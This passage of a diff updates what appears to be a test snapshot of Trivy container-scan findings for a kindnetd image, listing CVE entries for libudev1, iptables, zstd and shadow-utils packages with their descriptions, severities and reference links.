"https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -91643,368 +92500,453 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "1.3.8+dfsg-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-24031", + "installedVersion": "1.3.8+dfsg-3", + "packageName": "libzstd1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "https://access.redhat.com/security/cve/CVE-2021-24031", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", + "https://github.com/facebook/zstd/issues/1630", + "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", + "https://ubuntu.com/security/notices/USN-4760-1", + "https://ubuntu.com/security/notices/USN-5720-1", + "https://www.cve.org/CVERecord?id=CVE-2021-24031", + "https://www.facebook.com/security/advisories/cve-2021-24031", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "description": "In the Zstandard command-line utility prior to v1.4.1, output files were created with default permissions. Correct file permissions (matching the input) would only be set at completion time. Output files could therefore be readable or writable to unintended parties.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "zstd: adds read permissions to files while being compressed or uncompressed", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2021-24031", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "https://access.redhat.com/security/cve/CVE-2021-24031", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/facebook/zstd/issues/1630", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://ubuntu.com/security/notices/USN-4760-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-5720-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-24031", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://www.facebook.com/security/advisories/cve-2021-24031", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.3.8+dfsg-3+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-24032", + "installedVersion": "1.3.8+dfsg-3", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-24032", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", + "https://github.com/facebook/zstd/issues/2491", + "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", + "https://ubuntu.com/security/notices/USN-4760-1", + "https://ubuntu.com/security/notices/USN-5720-1", + "https://www.cve.org/CVERecord?id=CVE-2021-24032", + "https://www.facebook.com/security/advisories/cve-2021-24032", + ], + }, + "category": "Vulnerability", + "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "zstd: Race condition allows attacker to access world-readable destination file", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-24032", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://access.redhat.com/security/cve/CVE-2021-24032", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://github.com/facebook/zstd/issues/2491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-4760-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-5720-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-24032", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://www.facebook.com/security/advisories/cve-2021-24032", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], "severity": "LOW", @@ -92012,3323 +92954,3206 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) 